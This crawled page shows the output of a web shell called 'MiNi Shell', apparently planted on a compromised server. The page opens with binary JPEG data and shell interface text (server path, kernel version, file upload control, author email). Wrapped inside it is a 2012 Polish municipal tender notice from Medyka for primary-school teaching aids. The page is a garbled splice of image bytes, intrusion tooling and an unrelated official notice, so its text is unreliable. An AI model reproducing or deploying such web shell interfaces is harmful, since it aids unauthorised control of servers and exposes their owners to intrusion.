JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121001/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121001/372990-N-2012.html

<p class="kh_header"><b>Medyka: Indywidualizacja nauczania w klasach I-III szkół podstawowych w Gminie Medyka współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 9.1.2, Działania 9.1, Priorytetu IX Programu Operacyjnego Kapitał Ludzki - dostawa pomocy dydaktycznych.</b><br>
<b>Numer ogłoszenia: 372990 - 2012; data zamieszczenia: 01.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy Medyka , Medyka 288/38, 37-732 Medyka, woj. podkarpackie, tel. 016 6715377, faks 016 6715391.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.medyka.itl.pl/bip</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Indywidualizacja nauczania w klasach I-III szkół podstawowych w Gminie Medyka współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Poddziałania 9.1.2, Działania 9.1, Priorytetu IX Programu Operacyjnego Kapitał Ludzki - dostawa pomocy dydaktycznych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:

I.	Dostawa pomocy dydaktycznych dla Szkoły Podstawowej w Siedliskach do zajęć z dziećmi z trudnościami w czytaniu i pisaniu w następującym rodzaju i ilości.

1.	Karty obrazkowe 100 pierwszych słówek
Zestaw kart obrazkowych opracowano specjalnie dla dzieci od 3 roku życia. Przeznaczony jest do nauki w domu, w przedszkolu i szkole. Na kartach zamieszczono kolorowe zabawne ilustracje i podpisy  (awers i rewers). Łącznie komplet liczy 104 słówek. Zestaw zawiera:
a) 104 kolorowe karty, 
b) poradnik dla rodziców i nauczycieli, 
c) płyta CD z nagraniami słówek i piosenek.
- 1 komplet
2.	Piosenki Śpiewajmy dalej - książka
 W książce: 
a) teksty piosenek 
b) zabawne, kolorowe ilustracje 
c) uproszczony zapis nutowy. Na płycie: 
d) 14 piosenek dla dzieci, 36 minut nagrań 
e) piękna muzyka i efekty dźwiękowe 
f) różnorodne aranżacje
g) wersje KARAOKE 
h) 32 str.
 - 1 komplet

3.	Karaoke dla dzieci
Program do nauki języka  poprzez śpiew i zabawę. Zawiera zestaw 20 znanych i lubianych przez dzieci piosenek, które pomagają w nauce języka i są źródłem wspaniałej rozrywki, naturalna metoda poznawania języka i nauki wymowy, 
a) 20 znanych i lubianych przez dzieci piosenek, 
b) prosty interfejs i łatwa obsługa. Minimalne wymagania: Windows XP/Vista/7 min. 100 MB wolnego miejsca na dysku, Procesor Pentium IV CD-ROMx8, 1 GB RAM, karta graficzna zgodna z DirectX 9, karta dźwiękowa, Adobe Flash Player, Adobe AIR
 - 1 komplet
4.	Słowa w kawałkach
Wieloelementowa pomoc do nauki języka wprowadzająca 90 rodzin wyrazów, zachęcająca do poszukiwania znanych słów i nowych, których znaczenie dziecko dopiero pozna. Układanie dwuelementowych puzzli pomaga zapamiętać pisownię wyrazów, daje możliwość ćwiczeń wymowy. Elementy są oznaczone kolorem zgodnie z samogłoską występującą w rodzinie wyrazów i początkową głoską.
a) 220 el. 
b) instrukcja.
- 1 komplet

5.	Dni tygodnia - mata
Mata edukacyjna pozwalająca na efektywną naukę dni tygodnia . Bawiąc się na macie dzieci poznają nowe nazwy, wzbogacając własny zasób słownictwa. Usprawniają przy tym koordynację wzrokowo-ruchową. Ponadto ćwiczą pamięć wzrokową oraz koncentrację, a także uczą się rozumienia ze słuchu oraz wymowę 
a) od 4-10 lat. 
b) wym. 100 x 160 cm
 - 1 komplet

6.	Czasowniki - zdjęcia
Pomoc urozmaicająca wprowadzanie i utrwalanie słownictwa, do zabaw językowych. Układanie kart ułatwia zapamiętywanie poprawnej pisowni i słownictwa. Kolorowe paski umieszczone na fotografiach pomagają dziecku w samokontroli, dzięki temu dzieci mogą pracować samodzielnie lub z pomocą nauczyciela. Zestaw zawiera: 
a) 108 szt. fotografii o wym. 7 x 7 cm 
b) 108 szt. podpisów o wym. 7 x 3 cm 
c) instrukcję.
 - 1 komplet

7.	Budowanie zdań 
Pomoc do nauki języka pozwalająca na wprowadzanie i utrwalanie słownictwa, budowanie zdań, ćwiczenie płynności czytania i wprowadzanie zagadnień gramatycznych. Elementy oznaczone są kolorem w zależności od części mowy jaką prezentują. 
a) 250 elementów, 
b) instrukcja.
 - 1 komplet

8.	Rzeczowniki - zdjęcia 
Pomoc do nauki języka która ułatwia zapamiętywanie rzeczowników. Kolorowe paski umieszczone na fotografiach, pomagają dziecku w samokontroli, dzięki temu dzieci mogą pracować samodzielnie lub z pomocą nauczyciela. Zestaw zawiera: 
a) 108 szt. fotografii o wym. 7 x 7 cm 
b) 108 szt. podpisów o wym. 7 x 3 cm 
c) instrukcję.
 - 1 komplet

9.	Gra - Pim -Pam
Gra polegająca na odszukaniu na obrazkach jak największej ilości słów rozpoczynających się na literkę wylosowaną przez ruletkę. Im więcej słów tym większa szansa na wygraną. Gra rozwijająca spostrzegawczość, refleks i poszerza słownictwa. Dla 2-10 graczy w wieku od 8 lat. Opakowanie zawiera: 
a) 3 dwustronne plansze z obrazkami 
b) koło do losowania literek 
c) instrukcja.
 - 1 komplet

10.	Uczymy się słówek - książka z ćwiczeniami
400 kart ze zdjęciami do kserowania i wycięcia. Tematyka ćwiczeń: kolory, ubrania, żywność, meble, przedmioty codziennego użytku, przeciwieństwa, ludzie, zabawki, rodzina, uczucia, artykuły szkolne, zawody i inne. Do nauki słówek i budowania zdań w każdym języku. 
a) Wymiar zeszytu: 28 x 21,5 cm 
b) 3 gry planszowe 
c) puzzle z numerami od 1 do 20 
d) gra lotto i bingo.
 - 1 komplet

11.	Gdzie jest szczeniaczek? - 
Zdjęcia przedstawiające psa Puppy w różnym położeniu względem swojego domu-budy. Ćwiczenie pomagające zrozumieć pojęcia takie jak: obok, w środku, daleko, blisko, pomiędzy itp. Duża buda i 2 psy uatrakcyjniają ćwiczenia. 
a) 2 pieski o wys. 20,5 cm 
b) wym. budy 41,5 x 28 cm 
c) 14 zdjęć o wym. 21,4 x 14 cm 
d) 14 kart z napisami (6,5 x 2 cm)
 - 1 komplet

12.	 10 zestawów kontrolnych PUS
W zamykanym pudełku z tworzywa znajduje się 12 ponumerowanych klocków. 	 
 - 1 komplet

13.	Radioodtwarzacz Cd mp3 usb - 3 szt


II.	Dostawa pomocy dydaktycznych dla Szkoły Podstawowej w Siedliskach do zajęć dla dzieci z trudnościami w pokonywaniu trudności w zdobywaniu umiejętności matematyczno -przyrodniczych w następującym rodzaju i ilości.

1.	Klocki Jasia
Listewki z otworami, śruby, koła .Zabawa stymulująca koordynację wzrokowo-ruchową,  spostrzegawczość, twórcze myślenie.
a) 140 el.
 - 1 komplet

2.	Straż pożarna klocki
Klocki wykonane z  tworzywa sztucznego. 
a) 90 el. 
b) wym. 50 x 40 x 10 cm
Zabawa stymulująca koordynację wzrokowo-ruchową,  spostrzegawczość, twórcze myślenie. 
 - 1 komplet

3.	Zabawna farma
a) 71 el. 
b) wym. podstawy 32 x 16 cm 
c) wym. klocka 3 x 3 cm 
Zabawa stymulująca koordynację wzrokowo-ruchową,  spostrzegawczość, twórcze myślenie. W zakresie umiejętności przyrodniczych
 - 1 komplet

4.	Ekran projekcyjny na statywie 175x175 -	1 szt..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 39.16.21.00-6, 37.52.41.00-8, 31.71.00.00-6, 30.20.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający złoży oświadczenie o spełnianiu warunku z art. 22 ust. 1
Spełnienie warunku oceniane będzie na podstawie warunku granicznego spełnia niespełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie.
Spełnienie warunku oceniane będzie na podstawie warunku granicznego spełnia niespełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający złoży oświadczenie o spełnianiu warunku z art. 22 ust. 1
Spełnienie warunku oceniane będzie na podstawie warunku granicznego spełnia niespełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający złoży oświadczenie o spełnianiu warunku z art. 22 ust. 1
Spełnienie warunku oceniane będzie na podstawie warunku granicznego spełnia niespełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający złoży oświadczenie o spełnianiu warunku z art. 22 ust. 1
Spełnienie warunku oceniane będzie na podstawie warunku granicznego spełnia niespełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z treścią art. 144 ust. 1 ustawy Zamawiający przewiduje możliwość dokonania zmian w umowie zawartej z Dostawcą w zakresie wynagrodzenia wykonawcy- w przypadku ustawowej zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.medyka.itl.pl/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Medyka
Medyka 288
37-732 Medyka.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2012 godzina 10:00, miejsce: Gmina Medyka
Medyka 288
37-732 Medyka
w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane ze Środków Europejskiego Funduszu Społecznego w ramach Poddziałania 9.1.2, Działania 9.1, Priorytetu IX Programu Operacyjnego
Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com